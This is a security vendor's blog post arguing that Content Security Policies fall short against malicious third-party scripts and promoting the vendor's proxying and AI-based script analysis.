Linkedin Tag

Back to blog

Why CSPs Are Not Enough

Thursday, June 6th, 2024

Updated May 25th, 2024
Carlo D'Agnolo's profile picture

Carlo D'Agnolo

Content Security Policies (CSPs), scoped and promoted by the W3C, offer a browser-side feature designed to enhance web security. If implemented correctly, with specific rules per page, they can provide substantial security benefits.

However, in practice, they tend to be cumbersome to set up, frequently break during local development, and risk taking down sites when scripts change after years of stability.

The max header length limitation often results in wildcard rules, diluting their effectiveness. Much like DNSSEC, CSPs represent a valid problem with a poorly executed solution, often leading developers to abandon them entirely. The core issue remains unaddressed in the CSP3 specification.

The Bad of CSPs

They’re Tricky to Set Up And Maintain

CSPs require meticulous configuration to be effective, presenting a significant challenge, especially in dynamic web environments. New scripts, APIs, or content delivery networks are continuously integrated into websites, necessitating frequent updates to CSPs. This fluidity adds a layer of complexity and maintenance that can be overwhelming for developers, particularly in large-scale or rapidly evolving projects.

Performance is Lacking

The implementation of CSPs introduces additional computational overhead. Every request must be checked against the policy, potentially delaying the loading of resources and impacting user experience. Specifically for e-commerce minimal increases in load times are directly correlated to user dissatisfaction and drop-off rates. Balancing security measures with performance needs is a critical, yet often challenging, aspect of using CSPs.

Browser Are Not Uniform

The effectiveness of CSPs is also hampered by inconsistent support across different web browsers. Not all CSP directives are universally recognized or interpreted in the same way by every browser, leading to potential security loopholes. Developers must therefore craft CSPs that not only meet security requirements but also consider the peculiarities of browser behavior, complicating the deployment and testing phases.

Techniques to Circumvent CSPs

Sophisticated attackers have devised numerous methods to bypass CSPs. Common tactics include exploiting script sources that are too broadly defined within CSPs, leveraging whitelisted domains to serve malicious scripts, or manipulating CSP tokens like nonces and hashes. These vulnerabilities necessitate a more nuanced approach to defining and enforcing CSPs, emphasizing the need for stringent, context-aware policies.

CSPs also have a script max header length means that on many sites, 3rd party script URLs are too long and as a result, the full domain gets allowlisted.

Managing False Positives and Alert Fatigue

The flood of violation reports generated by CSPs, particularly in 'report-only' mode, can overwhelm security teams with false positives. Distinguishing between genuine security threats and benign anomalies requires sophisticated analysis tools and processes. Without effective management strategies, the risk of alert fatigue is high, potentially causing critical alerts to be overlooked or ignored.

The flood of violation reports generated by CSPs, particularly in 'report-only' mode, can overwhelm security teams with false positives. Distinguishing between genuine security threats and benign anomalies requires sophisticated analysis tools and processes. Without effective management strategies, the risk of alert fatigue is high, potentially causing critical alerts to be overlooked or ignored.

The More Secure Path

Despite all the above complaints, CSPs are still a good way to secure your site. They just shouldn’t be the only security measure against 3rd-party JavaScript attacks. Our comparison page gives a great overview of the features we have implemented on top of CSPs to provide the best possible safety regarding 3rd-party script breaches.

We believe the key lies in analyzing the entire script before it reaches the user's browser. Naturally, this presents a few challenges, for which we have engineered solutions.

100% Coverage, Proxy and Inline Scripts

We ensure that all scripts are reviewed before they are seen by the user’s browser. We do this by proxying them, allowing us to see the exact code fetched by the browser. This makes it possible for full code analysis knowing that we are seeing the same code as the browser of the user will.

We can do this by offering a tiny script that’s placed first in your website header. Instead of adding latency, in most cases we can even optimize the scripts through caching. Causing our proxy to improve performance more often than not.

On certain plans we also provide inline script detections. These scripts are embedded directly within HTML, as opposed to those loaded from external sources through JavaScript. They are often a target for cross-site scripting (XSS) attacks and can execute malicious code when a user visits a web page.

The Use of AI

C/side monitors over 60 attributes and uses AI to flag any indicators of malicious intent in real time. Our solution also takes into account historical context meaning changes over time get reviewed making it easier to spot sudden hijacks. We feed all historical data back into our AI & LLM to further bolster our detection mechanisms.

On top of that, we use AI to parse through the code of the 3rd party script in real-time. The combination of our defined detection mechanisms with the AI means we can spot the attempt in milliseconds and can shut it down before any malicious operations and or alert if dangerous behavior arises.

This makes it so malicious code never touches the browser of your user.